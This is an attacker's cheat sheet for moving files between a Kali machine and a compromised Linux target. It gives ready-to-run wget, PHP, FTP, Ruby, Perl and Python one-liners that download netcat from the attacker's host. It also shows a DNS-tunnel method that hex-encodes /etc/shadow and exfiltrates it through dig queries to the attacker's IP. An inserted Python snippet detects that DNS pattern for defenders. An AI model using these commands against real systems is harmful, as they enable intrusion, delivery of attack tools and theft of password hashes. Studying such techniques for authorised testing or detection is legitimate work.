Transfer Files - Linux

Replace 20.20.20.20 with the IP address of the Kali attacker machine.
Replace 10.10.10.10 with the IP address of the Linux target.

Transfer file using wget

On Kali, start a simple webserver on port 9999 to serve contents of /bin/:

php -S 0.0.0.0:9999 -t /bin/

On Linux target, run wget to download the file:

wget http://20.20.20.20:9999/nc -O /tmp/nc

Transfer file using DNS

On Kali, set up the listener:

tcpdump -w /tmp/shadow.pcap -s0 'port 53 and host 10.10.10.10'

On Linux target, convert the file to hex and send the hex as DNS queries:

xxd -p /etc/shadow shadow.hex
for b in $(cat shadow.hex); do dig @20.20.20.20 $b.google.com; done

On Kali, restore the file:

tcpdump -r /tmp/shadow.pcap -n | grep google.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > /tmp/shadow.txt
xxd -r -p /tmp/shadow.txt /tmp/shadow
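
For the defending side of the DNS transfer above, an added example (not part of the original page) that scans tcpdump -n text output for the pattern this method produces: many long, all-hex leftmost labels from one source under one parent domain. The 32-character floor, the min_queries threshold and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# tcpdump -n text line: "... IP <src>.<sport> > <dst>.53: <id>+ [flags] A? <name>. (len)"
QUERY_RE = re.compile(r"IP (\d+(?:\.\d+){3})\.\d+ > \S+\.53: .*? [A-Z]+\? (\S+?)\. ")
# Leftmost label that is nothing but hex and long. xxd -p emits 60 hex chars per
# line, which fits the 63-byte DNS label limit. The 32-char floor is an assumption.
HEX_LABEL_RE = re.compile(r"^[0-9a-f]{32,63}$")


def find_hex_label_bursts(lines, min_queries=3):
    """Return {(src_ip, parent_domain): (distinct_labels, decoded_bytes)} for sources
    that sent at least min_queries long all-hex leftmost labels under one parent."""
    seen = defaultdict(set)  # distinct labels only, so retransmissions are not counted twice
    for line in lines:
        m = QUERY_RE.search(line)
        if not m:
            continue  # not a DNS query line
        src, qname = m.groups()
        label, _, parent = qname.lower().partition(".")
        if parent and HEX_LABEL_RE.match(label):
            seen[(src, parent)].add(label)
    return {
        key: (len(labels), sum(len(lab) // 2 for lab in labels))
        for key, labels in seen.items()
        if len(labels) >= min_queries
    }


def _line(sec, src, qname):
    # Builds one constructed line in tcpdump -n text format.
    return f"10:00:{sec:02d}.000000 IP {src}.40000 > 20.20.20.20.53: 4242+ [1au] A? {qname}. (101)"


# Constructed sample traffic (not a real capture), using the page's placeholder addresses.
SAMPLE = [_line(i, "10.10.10.10", bytes(range(i, i + 30)).hex() + ".google.com") for i in range(5)]
SAMPLE.append(SAMPLE[0])  # a retransmitted query
SAMPLE += [
    _line(10, "10.10.10.11", "www.google.com"),
    _line(11, "10.10.10.11", "cafe.example.org"),  # short hex-looking word: ignored
    # a single hash-like label: matches the pattern but stays below the threshold
    _line(12, "10.10.10.11", "d41d8cd98f00b204e9800998ecf8427e.cdn.example.org"),
]

if __name__ == "__main__":
    for (src, parent), (n, size) in find_hex_label_bursts(SAMPLE).items():
        print(f"{src} -> *.{parent}: {n} hex labels, ~{size} bytes")
```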

Transfer file using PHP

On Kali, start a simple webserver on port 9999 to serve contents of /bin/:

php -S 0.0.0.0:9999 -t /bin/

On Linux target, execute php to download the file:

php -r 'error_reporting(E_ALL ^ E_NOTICE);file_put_contents("/tmp/nc", fopen("http://20.20.20.20:9999/nc", "r"));'

or

php -r 'function d($u,$o){$c=file_get_contents($u);file_put_contents($o,$c);}d("http://20.20.20.20:9999/nc","/tmp/nc");'

Transfer file using FTP

On Kali, start a simple FTP server:

twistd -n ftp -p 8888 -r /bin/

On Linux target, use ftp to download the file:

ftp 20.20.20.20 8888 <<< "get nc /tmp/nc"

Transfer file using Ruby

On Kali, start a simple webserver on port 9999 to serve contents of /bin/:

php -S 0.0.0.0:9999 -t /bin/

On Linux target, use Ruby to download the file via HTTP:

ruby -e "require'net/http';Net::HTTP.start('20.20.20.20','9999'){|http|resp=http.get('/nc');open('/tmp/nc','wb'){|file|file.write(resp.body)}}"

Transfer file using Perl

On Kali, start a simple webserver on port 9999 to serve contents of /bin/:

php -S 0.0.0.0:9999 -t /bin/

On Linux target, use Perl to download the file via HTTP:

perl -e 'use LWP::Simple; getstore("http://20.20.20.20:9999/nc", "/tmp/nc");'

Transfer file using Python

On Kali, start a simple webserver on port 9999 to serve contents of /bin/:

php -S 0.0.0.0:9999 -t /bin/

On Linux target, if using Python 2:

python2 -c "import urllib; urllib.urlretrieve ('http://20.20.20.20:9999/nc', r'/tmp/nc')"

or

python2 -c "import urllib2; u = urllib2.urlopen('http://20.20.20.20:9999/nc'); f = open('/tmp/nc', 'wb'); f.write(u.read()); f.close()"

On Linux target, if using Python 3:

python3 -c "import urllib.request; urllib.request.urlretrieve ('http://20.20.20.20:9999/nc', r'/tmp/nc')"